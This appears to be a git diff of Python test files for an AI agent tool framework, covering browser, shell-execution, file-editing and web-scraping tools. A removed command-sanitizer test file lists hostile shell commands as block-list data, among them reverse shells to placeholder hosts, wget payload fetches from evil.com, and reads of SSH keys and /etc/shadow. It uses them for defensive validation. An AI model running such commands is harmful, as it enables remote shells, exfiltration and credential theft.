mock_bridge.create_context = AsyncMock(side_effect=mock_create_context)
# Register tools first
register_lifecycle_tools(mcp)
browser_start = mcp._tool_manager._tools["browser_start"].fn
from gcu.browser.tools.lifecycle import _ensure_context
# Now patch for execution
with patch("gcu.browser.tools.lifecycle.get_bridge", return_value=mock_bridge):
# Simulate 3 different subagents starting browsers
results = await asyncio.gather(
browser_start(profile="agent_1"),
browser_start(profile="agent_2"),
browser_start(profile="agent_3"),
)
results = await asyncio.gather(
_ensure_context(mock_bridge, "agent_1"),
_ensure_context(mock_bridge, "agent_2"),
_ensure_context(mock_bridge, "agent_3"),
)
# Each should have created a separate context
assert mock_bridge.create_context.call_count == 3
assert all(r.get("ok") for r in results)
assert all(created for (_, _, created) in results)
@pytest.mark.asyncio
async def test_concurrent_tab_operations_different_groups(self, mcp: FastMCP, mock_bridge: MagicMock):
@@ -709,11 +703,11 @@ class TestErrorHandling:
mock_bridge = MagicMock(spec=BeelineBridge)
mock_bridge.is_connected = False
register_lifecycle_tools(mcp)
browser_start = mcp._tool_manager._tools["browser_start"].fn
register_tab_tools(mcp)
browser_open = mcp._tool_manager._tools["browser_open"].fn
with patch("gcu.browser.tools.lifecycle.get_bridge", return_value=mock_bridge):
result = await browser_start(profile="test")
with patch("gcu.browser.tools.tabs.get_bridge", return_value=mock_bridge):
result = await browser_open(url="https://example.com", profile="test")
assert result.get("ok") is False
assert "not connected" in result.get("error", "").lower()
+1 -3
View File
@@ -20,9 +20,7 @@ def test_register_chart_tools_lands_all(mcp):
from chart_tools import register_chart_tools
names = register_chart_tools(mcp)
assert set(names) == EXPECTED_TOOLS, (
f"missing: {EXPECTED_TOOLS - set(names)}, extra: {set(names) - EXPECTED_TOOLS}"
)
assert set(names) == EXPECTED_TOOLS, f"missing: {EXPECTED_TOOLS - set(names)}, extra: {set(names) - EXPECTED_TOOLS}"
def test_all_tools_have_chart_prefix(mcp):
-238
View File
@@ -1,238 +0,0 @@
"""Tests for command_sanitizer — validates that dangerous commands are blocked
while normal development commands pass through unmodified."""
import pytest
from aden_tools.tools.file_system_toolkits.command_sanitizer import (
CommandBlockedError,
validate_command,
)
# ---------------------------------------------------------------------------
# Safe commands that MUST pass validation
# ---------------------------------------------------------------------------
class TestSafeCommands:
"""Common dev commands that should never be blocked."""
@pytest.mark.parametrize(
"cmd",
[
"echo hello",
"echo 'Hello World'",
"uv run pytest tests/ -v",
"uv pip install requests",
"git status",
"git diff --cached",
"git log -n 5",
"git add .",
"git commit -m 'fix: typo'",
"python script.py",
"python -m pytest",
"python3 script.py",
"python manage.py migrate",
"ls -la",
"dir /a",
"cat README.md",
"head -n 20 file.py",
"tail -f log.txt",
"grep -r 'pattern' src/",
"find . -name '*.py'",
"ruff check .",
"ruff format --check .",
"mypy src/",
"npm install",
"npm run build",
"npm test",
"node server.js",
"make test",
"make check",
"cargo build",
"go build ./...",
"dotnet build",
"pip install -r requirements.txt",
"cd src && ls",
"echo hello && echo world",
"cat file.py | grep pattern",
"pytest tests/ -v --tb=short",
"rm temp.txt",
"rm -f temp.log",
"del temp.txt",
"mkdir -p output/logs",
"cp file1.py file2.py",
"mv old.txt new.txt",
"wc -l *.py",
"sort output.txt",
"diff file1.py file2.py",
"tree src/",
"curl https://api.example.com/data",
"curl -X POST -H 'Content-Type: application/json' https://api.example.com",
],
)
def test_safe_command_passes(self, cmd):
"""Should not raise for common dev commands."""
validate_command(cmd) # should not raise
def test_empty_command(self):
"""Empty and whitespace-only commands should pass."""
validate_command("")
validate_command(" ")
validate_command(None) # type: ignore[arg-type] — edge case
# ---------------------------------------------------------------------------
# Dangerous commands that MUST be blocked
# ---------------------------------------------------------------------------
class TestBlockedExecutables:
"""Commands using blocked executables should raise CommandBlockedError."""
@pytest.mark.parametrize(
"cmd",
[
# Network exfiltration
"wget http://evil.com/payload",
"nc -e /bin/sh attacker.com 4444",
"ncat attacker.com 1234",
"nmap -sS 192.168.1.0/24",
"ssh user@remote",
"scp file.txt user@remote:/tmp/",
"ftp ftp.example.com",
"telnet example.com 80",
"rsync -avz . user@remote:/data",
# Windows network tools
"invoke-webrequest https://evil.com",
"iwr https://evil.com",
"certutil -urlcache -split -f http://evil.com/payload",
# User escalation
"useradd hacker",
"userdel admin",
"adduser hacker",
"passwd root",
"net user hacker P@ss123 /add",
"net localgroup administrators hacker /add",
# System destructive
"shutdown /s /t 0",
"reboot",
"halt",
"poweroff",
"mkfs.ext4 /dev/sda1",
"diskpart",
# Shell interpreters (direct invocation)
"bash -c 'echo hacked'",
"sh -c 'rm -rf /'",
"powershell -Command Get-Process",
"pwsh -c 'ls'",
"cmd /c dir",
"cmd.exe /c dir",
],
)
def test_blocked_executable(self, cmd):
"""Should raise CommandBlockedError for dangerous executables."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
class TestBlockedPatterns:
"""Commands matching dangerous patterns should be blocked."""
@pytest.mark.parametrize(
"cmd",
[
# Recursive delete of root / home
"rm -rf /",
"rm -rf ~",
"rm -rf ..",
"rm -rf C:\\",
"rm -f -r /",
# sudo
"sudo apt install something",
"sudo rm -rf /var/log",
# Reverse shell indicators
"bash -i >& /dev/tcp/10.0.0.1/4444",
# Credential theft
"cat ~/.ssh/id_rsa",
"cat /etc/shadow",
"cat something/credential_key",
"type something\\credential_key",
# Command substitution with dangerous tools
"echo `wget http://evil.com`",
# Environment variable exfiltration
"echo $API_KEY",
"echo ${SECRET_TOKEN}",
],
)
def test_blocked_pattern(self, cmd):
"""Should raise CommandBlockedError for dangerous patterns."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
class TestChainedCommands:
"""Dangerous commands hidden in compound statements should be caught."""
@pytest.mark.parametrize(
"cmd",
[
"echo hi && wget http://evil.com/payload",
"echo hi || ssh attacker@remote",
"ls | nc attacker.com 4444",
"echo safe; bash -c 'evil stuff'",
"git status; shutdown /s /t 0",
],
)
def test_chained_dangerous_command(self, cmd):
"""Dangerous commands chained with safe ones should be blocked."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
class TestEdgeCases:
"""Edge cases and possible bypass attempts."""
def test_env_var_prefix_does_not_bypass(self):
"""FOO=bar wget ... should still be blocked."""
with pytest.raises(CommandBlockedError):
validate_command("FOO=bar wget http://evil.com")
@pytest.mark.parametrize(
"cmd",
[
"/usr/bin/wget https://attacker.com",
"C:\\Windows\\System32\\cmd.exe /c dir",
],
)
def test_directory_prefix_does_not_bypass(self, cmd):
"""Absolute executable paths should still match the blocklist."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
def test_case_insensitive_blocking(self):
"""Blocking should be case-insensitive."""
with pytest.raises(CommandBlockedError):
validate_command("Wget http://evil.com")
def test_exe_suffix_stripped(self):
"""cmd.exe should be blocked same as cmd."""
with pytest.raises(CommandBlockedError):
validate_command("cmd.exe /c dir")
def test_safe_rm_without_dangerous_target(self):
"""rm of a specific file (not root/home) should pass."""
validate_command("rm temp.txt")
validate_command("rm -f output.log")
def test_python_commands_are_safe(self):
"""python commands (including -c) are allowed for agent scripting."""
validate_command("python script.py")
validate_command("python -m pytest tests/")
validate_command("python3 -c 'print(1)'")
validate_command("python -c 'import json; print(json.dumps({}))'")
validate_command("node -e 'console.log(1)'")
def test_error_message_is_descriptive(self):
"""Blocked commands should include a useful error message."""
with pytest.raises(CommandBlockedError, match="blocked for safety"):
validate_command("wget http://evil.com")
+1 -3
View File
@@ -63,9 +63,7 @@ def test_merge_stderr(job_tools):
merge_stderr=True,
)
job_id = started["job_id"]
result = job_tools["logs"](
job_id=job_id, stream="merged", wait_until_exit=True, wait_timeout_sec=5
)
result = job_tools["logs"](job_id=job_id, stream="merged", wait_until_exit=True, wait_timeout_sec=5)
assert "stdout1" in result["data"]
assert "stderr1" in result["data"]
+1 -3
View File
@@ -20,9 +20,7 @@ def test_register_terminal_tools_lands_all_ten(mcp):
from terminal_tools import register_terminal_tools
names = register_terminal_tools(mcp)
assert set(names) == EXPECTED_TOOLS, (
f"missing: {EXPECTED_TOOLS - set(names)}, extra: {set(names) - EXPECTED_TOOLS}"
)
assert set(names) == EXPECTED_TOOLS, f"missing: {EXPECTED_TOOLS - set(names)}, extra: {set(names) - EXPECTED_TOOLS}"
def test_all_tools_have_terminal_prefix(mcp):
+6 -4
View File
@@ -56,10 +56,12 @@ async def reproduce_agent_session(session: BrowserSession):
print("=" * 100)
total_start = time.time()
# ── Turn 1 (seq 1-2): browser_start ──────────────────────────────────
# ── Turn 1 (seq 1-2): session start ──────────────────────────────────
# Original 2026-02 transcript called the now-deleted browser_start MCP
# tool here; cold-start is now folded into browser_open via lazy-start.
t0 = time.time()
result = await session.start(headless=False, persistent=True)
log(1, "browser_start()", f"ok={result['ok']}, status={result.get('status')}", time.time() - t0)
log(1, "session.start()", f"ok={result['ok']}, status={result.get('status')}", time.time() - t0)
# ── Turn 2 (seq 3-4): browser_open ───────────────────────────────────
t0 = time.time()
@@ -235,10 +237,10 @@ async def demonstrate_correct_approach(session: BrowserSession):
print("=" * 100)
total_start = time.time()
# ── Turn 1: browser_start ────────────────────────────────────────────
# ── Turn 1: session start ────────────────────────────────────────────
t0 = time.time()
result = await session.start(headless=False, persistent=True)
log(1, "browser_start()", f"ok={result['ok']}", time.time() - t0)
log(1, "session.start()", f"ok={result['ok']}", time.time() - t0)
# ── Turn 2: browser_open + browser_wait for SPA ──────────────────────
t0 = time.time()
-126
View File
@@ -1,126 +0,0 @@
"""Tests for example_tool - A simple text processing tool."""
import pytest
from fastmcp import FastMCP
from aden_tools.tools.example_tool.example_tool import register_tools
@pytest.fixture
def example_tool_fn(mcp: FastMCP):
"""Register and return the example_tool function."""
register_tools(mcp)
return mcp._tool_manager._tools["example_tool"].fn
class TestExampleTool:
"""Tests for example_tool function."""
def test_valid_message(self, example_tool_fn):
"""Basic message returns unchanged."""
result = example_tool_fn(message="Hello, World!")
assert result == "Hello, World!"
def test_uppercase_true(self, example_tool_fn):
"""uppercase=True converts message to uppercase."""
result = example_tool_fn(message="hello", uppercase=True)
assert result == "HELLO"
def test_uppercase_false(self, example_tool_fn):
"""uppercase=False (default) preserves case."""
result = example_tool_fn(message="Hello", uppercase=False)
assert result == "Hello"
def test_repeat_multiple(self, example_tool_fn):
"""repeat=3 joins message with spaces."""
result = example_tool_fn(message="Hi", repeat=3)
assert result == "Hi Hi Hi"
def test_repeat_default(self, example_tool_fn):
"""repeat=1 (default) returns single message."""
result = example_tool_fn(message="Hello", repeat=1)
assert result == "Hello"
def test_uppercase_and_repeat_combined(self, example_tool_fn):
"""uppercase and repeat work together."""
result = example_tool_fn(message="hi", uppercase=True, repeat=2)
assert result == "HI HI"
def test_empty_message_error(self, example_tool_fn):
"""Empty string returns error string."""
result = example_tool_fn(message="")
assert "Error" in result
assert "1-1000" in result
def test_message_too_long_error(self, example_tool_fn):
"""Message over 1000 chars returns error string."""
long_message = "x" * 1001
result = example_tool_fn(message=long_message)
assert "Error" in result
assert "1-1000" in result
def test_message_at_max_length(self, example_tool_fn):
"""Message exactly 1000 chars is valid."""
max_message = "x" * 1000
result = example_tool_fn(message=max_message)
assert result == max_message
def test_repeat_zero_error(self, example_tool_fn):
"""repeat=0 returns error string."""
result = example_tool_fn(message="Hi", repeat=0)
assert "Error" in result
assert "1-10" in result
def test_repeat_eleven_error(self, example_tool_fn):
"""repeat=11 returns error string."""
result = example_tool_fn(message="Hi", repeat=11)
assert "Error" in result
assert "1-10" in result
def test_repeat_at_max(self, example_tool_fn):
"""repeat=10 (maximum) is valid."""
result = example_tool_fn(message="Hi", repeat=10)
assert result == " ".join(["Hi"] * 10)
def test_repeat_negative_error(self, example_tool_fn):
"""Negative repeat returns error string."""
result = example_tool_fn(message="Hi", repeat=-1)
assert "Error" in result
assert "1-10" in result
def test_whitespace_only_message(self, example_tool_fn):
"""Whitespace-only message is valid (non-empty)."""
result = example_tool_fn(message=" ")
assert result == " "
def test_special_characters_in_message(self, example_tool_fn):
"""Special characters are preserved."""
result = example_tool_fn(message="Hello! @#$%^&*()")
assert result == "Hello! @#$%^&*()"
def test_unicode_message(self, example_tool_fn):
"""Unicode characters are handled correctly."""
result = example_tool_fn(message="Hello 世界 🌍")
assert result == "Hello 世界 🌍"
def test_unicode_uppercase(self, example_tool_fn):
"""Unicode uppercase conversion works."""
result = example_tool_fn(message="café", uppercase=True)
assert result == "CAFÉ"
+3 -16
View File
@@ -280,7 +280,7 @@ class TestPatchToolReplaceMode:
result = edit_fn(
mode="replace",
path="b.py",
old_string='print(“hi”)',
old_string="print(“hi”)",
new_string='print("HELLO")',
)
assert "Error" not in result
@@ -331,14 +331,7 @@ class TestPatchToolPatchMode:
"""A V4A Update hunk replaces matched lines and writes."""
target = tmp_path / "u.py"
target.write_text("def f():\n return 1\n", encoding="utf-8")
body = (
"*** Begin Patch\n"
"*** Update File: u.py\n"
" def f():\n"
"- return 1\n"
"+ return 42\n"
"*** End Patch\n"
)
body = "*** Begin Patch\n*** Update File: u.py\n def f():\n- return 1\n+ return 42\n*** End Patch\n"
edit_fn = _get_tool_fn(file_ops_mcp, "edit_file")
result = edit_fn(mode="patch", patch_text=body)
assert "Error" not in result
@@ -347,13 +340,7 @@ class TestPatchToolPatchMode:
def test_patch_add_file(self, file_ops_mcp, tmp_path):
"""Add File: creates a new file from + lines."""
body = (
"*** Begin Patch\n"
"*** Add File: new.py\n"
"+# new\n"
"+x = 1\n"
"*** End Patch\n"
)
body = "*** Begin Patch\n*** Add File: new.py\n+# new\n+x = 1\n*** End Patch\n"
edit_fn = _get_tool_fn(file_ops_mcp, "edit_file")
result = edit_fn(mode="patch", patch_text=body)
assert "Error" not in result
@@ -1,226 +0,0 @@
"""Tests for the remaining file_system_toolkits — execute_command_tool only.
The file tools (read_file, write_file, edit_file, hashline_edit, search_files,
apply_patch) all live in aden_tools.file_ops and are tested in test_file_ops.py.
"""
import asyncio
import os
import sys
from unittest.mock import patch
import pytest
from fastmcp import FastMCP
@pytest.fixture
def mcp():
"""Create a FastMCP instance."""
return FastMCP("test-server")
@pytest.fixture
def mock_workspace():
"""Mock agent ID for the shell tool."""
return {"agent_id": "test-agent"}
@pytest.fixture
def mock_secure_path(tmp_path):
"""Patch the shell tool's sandbox resolver onto tmp_path."""
def _get_sandboxed_path(path, agent_id):
return os.path.join(tmp_path, path)
with (
patch(
"aden_tools.tools.file_system_toolkits.execute_command_tool.execute_command_tool.get_sandboxed_path",
side_effect=_get_sandboxed_path,
),
patch(
"aden_tools.tools.file_system_toolkits.execute_command_tool.execute_command_tool.AGENT_SANDBOXES_DIR",
str(tmp_path),
),
):
yield
class TestExecuteCommandTool:
"""Tests for execute_command_tool."""
@pytest.fixture
def execute_command_fn(self, mcp):
from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools
register_tools(mcp)
return mcp._tool_manager._tools["execute_command_tool"].fn
async def test_execute_simple_command(self, execute_command_fn, mock_workspace, mock_secure_path):
"""Executing a simple command returns output."""
result = await execute_command_fn(command="echo 'Hello World'", **mock_workspace)
assert result["success"] is True
assert result["return_code"] == 0
assert "Hello World" in result["stdout"]
async def test_execute_failing_command(self, execute_command_fn, mock_workspace, mock_secure_path):
"""Executing a failing command returns non-zero exit code."""
result = await execute_command_fn(command="exit 1", **mock_workspace)
assert result["success"] is True
assert result["return_code"] == 1
async def test_execute_command_with_stderr(self, execute_command_fn, mock_workspace, mock_secure_path):
"""Executing a command that writes to stderr captures it."""
result = await execute_command_fn(command="echo 'error message' >&2", **mock_workspace)
assert result["success"] is True
assert "error message" in result.get("stderr", "")
async def test_execute_command_list_files(self, execute_command_fn, mock_workspace, mock_secure_path, tmp_path):
"""Executing ls command lists files."""
(tmp_path / "testfile.txt").write_text("content", encoding="utf-8")
result = await execute_command_fn(command=f"ls {tmp_path}", **mock_workspace)
assert result["success"] is True
assert result["return_code"] == 0
assert "testfile.txt" in result["stdout"]
async def test_execute_command_with_pipe(self, execute_command_fn, mock_workspace, mock_secure_path):
"""Executing a command with pipe works correctly."""
result = await execute_command_fn(command="echo 'hello world' | tr 'a-z' 'A-Z'", **mock_workspace)
assert result["success"] is True
assert result["return_code"] == 0
assert "HELLO WORLD" in result["stdout"]
@pytest.fixture
def bash_output_fn(self, mcp):
from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools
register_tools(mcp)
return mcp._tool_manager._tools["bash_output"].fn
@pytest.fixture
def bash_kill_fn(self, mcp):
from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools
register_tools(mcp)
return mcp._tool_manager._tools["bash_kill"].fn
async def test_per_call_timeout_overrides_default(self, execute_command_fn, mock_workspace, mock_secure_path):
"""A per-call timeout under the default kills the command early."""
import time
start = time.monotonic()
result = await execute_command_fn(
command="sleep 10",
timeout_seconds=1,
**mock_workspace,
)
elapsed = time.monotonic() - start
assert result.get("timed_out") is True
assert "1 seconds" in result.get("error", "")
assert elapsed < 5, f"timeout did not kill the command promptly ({elapsed:.2f}s)"
async def test_timeout_is_clamped_upwards(self, execute_command_fn, mock_workspace, mock_secure_path):
"""A timeout above the 600s ceiling is silently clamped."""
result = await execute_command_fn(
command="echo fast",
timeout_seconds=99999,
**mock_workspace,
)
assert result["success"] is True
assert "fast" in result["stdout"]
async def test_event_loop_unblocked_while_command_runs(self, execute_command_fn, mock_workspace, mock_secure_path):
"""The event loop keeps servicing other tasks while a bash command runs."""
ticks = 0
async def ticker():
nonlocal ticks
for _ in range(20):
await asyncio.sleep(0.05)
ticks += 1
ticker_task = asyncio.create_task(ticker())
result = await execute_command_fn(command="sleep 0.5", **mock_workspace)
await ticker_task
assert result["success"] is True
assert ticks >= 5, f"event loop looked blocked during subprocess (only {ticks} ticks in 1s)"
async def test_background_job_start_poll_and_complete(
self,
execute_command_fn,
bash_output_fn,
mock_workspace,
mock_secure_path,
):
"""A run_in_background job can be started, polled, and reports its exit status."""
py_script = (
"import time,sys;"
"print('one');sys.stdout.flush();time.sleep(0.1);"
"print('two');sys.stdout.flush();time.sleep(0.1);"
"print('three')"
)
start_result = await execute_command_fn(
command=f'"{sys.executable}" -c "{py_script}"',
run_in_background=True,
**mock_workspace,
)
assert start_result["background"] is True
job_id = start_result["id"]
deadline = asyncio.get_event_loop().time() + 5.0
seen_text = ""
while asyncio.get_event_loop().time() < deadline:
poll = await bash_output_fn(id=job_id, **mock_workspace)
seen_text += poll["stdout"]
if poll["status"].startswith("exited"):
break
await asyncio.sleep(0.05)
assert "one" in seen_text
assert "two" in seen_text
assert "three" in seen_text
assert poll["status"] == "exited(0)"
async def test_background_job_kill(
self,
execute_command_fn,
bash_output_fn,
bash_kill_fn,
mock_workspace,
mock_secure_path,
):
"""bash_kill terminates a long-running background job."""
start_result = await execute_command_fn(
command="sleep 30",
run_in_background=True,
**mock_workspace,
)
job_id = start_result["id"]
kill_result = await bash_kill_fn(id=job_id, **mock_workspace)
assert kill_result["id"] == job_id
assert "terminated" in kill_result["status"] or "killed" in kill_result["status"]
poll = await bash_output_fn(id=job_id, **mock_workspace)
assert "no background job" in poll.get("error", "")
async def test_bash_output_isolated_across_agents(self, execute_command_fn, bash_output_fn, mock_secure_path):
"""Agent A's job id is not reachable from agent B."""
start = await execute_command_fn(
command="sleep 5",
run_in_background=True,
agent_id="agent-A",
)
poll_b = await bash_output_fn(id=start["id"], agent_id="agent-B")
assert "no background job" in poll_b.get("error", "")
from aden_tools.tools.file_system_toolkits.execute_command_tool import background_jobs
await background_jobs.clear_agent("agent-A")
+185 -1
View File
@@ -374,6 +374,188 @@ class TestWebScrapeToolLinkConversion:
assert len([t for t in texts if not t.strip()]) == 0
class TestWebScrapeToolAIFriendlyOutput:
"""Tests for the AI-friendly output additions: structured data,
headings, page_type, block-level newlines, inline links, truncation
metadata, and offset-based pagination."""
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_block_level_newlines_preserved(self, mock_pw, mock_stealth, web_scrape_fn):
"""Block elements (p, h1, li) produce newlines, not space-collapsed."""
html = """
<html><body>
<h1>Title</h1>
<p>First paragraph.</p>
<p>Second paragraph.</p>
<ul><li>Item one</li><li>Item two</li></ul>
</body></html>
"""
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com")
assert "error" not in result
content = result["content"]
assert "Title" in content
assert "First paragraph." in content
assert "Second paragraph." in content
# Block separation should produce newlines, not run paragraphs together
assert "First paragraph.\n" in content or "First paragraph.\n\nSecond" in content
assert "Item one" in content and "Item two" in content
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_headings_outline_returned(self, mock_pw, mock_stealth, web_scrape_fn):
"""Headings outline lists h1-h6 with level + text."""
html = """
<html><body>
<h1>Top</h1>
<h2>Section A</h2>
<h3>Sub A1</h3>
</body></html>
"""
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com")
assert result["headings"] == [
{"level": 1, "text": "Top"},
{"level": 2, "text": "Section A"},
{"level": 3, "text": "Sub A1"},
]
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_inline_links_when_include_links(self, mock_pw, mock_stealth, web_scrape_fn):
"""include_links=True inlines anchors as [text](url) in content."""
html = """
<html><body>
<p>See <a href="/docs">our docs</a> for details.</p>
</body></html>
"""
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com", include_links=True)
assert "[our docs](https://example.com/docs)" in result["content"]
# Separate links list still present for back-compat
assert any(link["text"] == "our docs" for link in result["links"])
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_structured_data_json_ld(self, mock_pw, mock_stealth, web_scrape_fn):
"""JSON-LD blocks are parsed and surfaced under structured_data."""
html = """
<html><head>
<script type="application/ld+json">
{"@type": "Article", "headline": "Hello"}
</script>
</head><body><p>body</p></body></html>
"""
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com")
assert "structured_data" in result
assert result["structured_data"]["json_ld"] == [{"@type": "Article", "headline": "Hello"}]
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_structured_data_open_graph(self, mock_pw, mock_stealth, web_scrape_fn):
"""OpenGraph meta tags are surfaced under structured_data.open_graph."""
html = """
<html><head>
<meta property="og:title" content="OG Title">
<meta property="og:type" content="article">
</head><body><p>body</p></body></html>
"""
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com")
assert result["structured_data"]["open_graph"] == {
"title": "OG Title",
"type": "article",
}
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_truncation_metadata(self, mock_pw, mock_stealth, web_scrape_fn):
"""Truncated responses set truncated/total_length/next_offset."""
html = f"<html><body>{'a' * 5000}</body></html>"
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com", max_length=1000)
assert result["truncated"] is True
assert result["total_length"] == 5000
assert result["next_offset"] == 1000
assert result["offset"] == 0
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_offset_pagination(self, mock_pw, mock_stealth, web_scrape_fn):
"""offset arg returns content starting from the given character."""
body = "a" * 1000 + "b" * 1000 + "c" * 1000
html = f"<html><body>{body}</body></html>"
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com", max_length=1000, offset=1000)
assert result["offset"] == 1000
# Window should start in the b-region
assert result["content"].startswith("b")
assert result["truncated"] is True
assert result["next_offset"] == 2000
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_page_type_listing(self, mock_pw, mock_stealth, web_scrape_fn):
"""3+ <article> elements => page_type 'listing'."""
html = """
<html><body>
<article><h2>Post 1</h2></article>
<article><h2>Post 2</h2></article>
<article><h2>Post 3</h2></article>
</body></html>
"""
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com")
assert result["page_type"] == "listing"
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_page_type_article(self, mock_pw, mock_stealth, web_scrape_fn):
"""Single <article> => page_type 'article'."""
html = "<html><body><article><p>Hello</p></article></body></html>"
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com")
assert result["page_type"] == "article"
class TestWebScrapeToolErrorHandling:
"""Tests for error handling and early exit before JS wait."""
@@ -388,7 +570,9 @@ class TestWebScrapeToolErrorHandling:
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com/missing")
assert result == {"error": "HTTP 404: Failed to fetch URL"}
assert result["error"] == "HTTP 404: Failed to fetch URL"
assert result["status"] == 404
assert "hint" in result
mock_page.wait_for_load_state.assert_not_called()
@pytest.mark.asyncio